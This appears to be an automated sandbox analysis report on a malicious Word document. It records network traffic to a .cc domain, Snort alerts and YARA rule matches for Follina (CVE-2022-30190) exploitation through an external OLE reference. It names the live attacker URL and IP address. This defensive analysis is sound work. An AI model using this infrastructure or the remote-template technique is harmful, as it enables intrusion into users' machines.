      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficDNS query: name: ascota.cc
      Source: global trafficDNS query: name: ascota.cc
      Source: global trafficDNS query: name: ascota.cc
      Source: global trafficDNS query: name: ascota.cc
      Source: global trafficDNS query: name: ascota.cc
      Source: global trafficDNS query: name: ascota.cc
      Source: global trafficDNS query: name: ascota.cc
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 50.31.246.2:443

      Networking

      barindex
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2027758 ET DNS Query for .cc TLD 192.168.2.22:55868 -> 8.8.8.8:53
      Source: TrafficSnort IDS: 2027758 ET DNS Query for .cc TLD 192.168.2.22:49688 -> 8.8.8.8:53
      Source: TrafficSnort IDS: 2027758 ET DNS Query for .cc TLD 192.168.2.22:58836 -> 8.8.8.8:53
      Source: TrafficSnort IDS: 2027758 ET DNS Query for .cc TLD 192.168.2.22:50134 -> 8.8.8.8:53
      Source: TrafficSnort IDS: 2027758 ET DNS Query for .cc TLD 192.168.2.22:55275 -> 8.8.8.8:53
      Source: TrafficSnort IDS: 2027758 ET DNS Query for .cc TLD 192.168.2.22:59915 -> 8.8.8.8:53
      Source: TrafficSnort IDS: 2027758 ET DNS Query for .cc TLD 192.168.2.22:54408 -> 8.8.8.8:53
      Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: ascota.ccConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: ascota.ccIf-Modified-Since: Thu, 02 Jun 2022 20:21:18 GMTIf-None-Match: "fbdacf8fb5cca0abfed43223d32f89dd"Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ascota.ccIf-Modified-Since: Thu, 02 Jun 2022 20:21:18 GMTIf-None-Match: "fbdacf8fb5cca0abfed43223d32f89dd"Connection: Keep-Alive
      Source: Joe Sandbox ViewASN Name: FLYUS FLYUS
      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: unknownHTTPS traffic detected: 50.31.246.2:443 -> 192.168.2.22:49172 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 50.31.246.2:443 -> 192.168.2.22:49173 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 50.31.246.2:443 -> 192.168.2.22:49181 version: TLS 1.0
      Source: unknownNetwork traffic detected: HTTP traffic on port 49185 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49185
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49182
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
      Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
      Source: unknownNetwork traffic detected: HTTP traffic on port 49182 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
      Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
      Source: ~WRS{27621888-E8BB-4FE6-AECB-5EEE72734B15}.tmp.0.dr, ~WRF{CAFD337F-CA0A-421A-962F-5A83F314B963}.tmp.0.drString found in binary or memory: https://ascota.cc/index.html
      Source: ~WRF{CAFD337F-CA0A-421A-962F-5A83F314B963}.tmp.0.drString found in binary or memory: https://ascota.cc/index.htmlyX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5F4EA255-C5EC-4225-B349-94755FC9E7B4}.tmpJump to behavior
      Source: unknownDNS traffic detected: queries for: ascota.cc
      Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: ascota.ccConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: ascota.ccIf-Modified-Since: Thu, 02 Jun 2022 20:21:18 GMTIf-None-Match: "fbdacf8fb5cca0abfed43223d32f89dd"Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ascota.ccIf-Modified-Since: Thu, 02 Jun 2022 20:21:18 GMTIf-None-Match: "fbdacf8fb5cca0abfed43223d32f89dd"Connection: Keep-Alive
      Source: unknownHTTPS traffic detected: 50.31.246.2:443 -> 192.168.2.22:49171 version: TLS 1.2

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: document.xml.rels, type: SAMPLEMatched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen
      Source: sslproxydump.pcap, type: PCAPMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: sslproxydump.pcap, type: PCAPMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: document.xml.rels, type: SAMPLEMatched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
      Source: document.xml.rels, type: SAMPLEMatched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\951D3BEA.htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\951D3BEA.htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB03D47C.htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB03D47C.htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: ~WRF{CAFD337F-CA0A-421A-962F-5A83F314B963}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: 3BgX69C870.docxMetadefender: Detection: 20%
      Source: 3BgX69C870.docxReversingLabs: Detection: 65%
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: 3BgX69C870.LNK.0.drLNK file: ..\..\..\..\..\Desktop\3BgX69C870.docx
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$gX69C870.docxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR62E7.tmpJump to behavior
      Source: classification engineClassification label: mal100.expl.evad.winDOCX@1/19@7/1
      Source: ~WRF{CAFD337F-CA0A-421A-962F-5A83F314B963}.tmp.0.drOLE document summary: title field not present or empty
      Source: ~WRF{CAFD337F-CA0A-421A-962F-5A83F314B963}.tmp.0.drOLE document summary: author field not present or empty
      Source: ~WRF{CAFD337F-CA0A-421A-962F-5A83F314B963}.tmp.0.drOLE document summary: edited time not present or 0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: ~WRF{CAFD337F-CA0A-421A-962F-5A83F314B963}.tmp.0.drInitial sample: OLE indicators vbamacros = False

      Persistence and Installation Behavior

      barindex
      Contains an external reference to another file
      Source: document.xml.relsExtracted files from sample: https://ascota.cc/index.html!
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
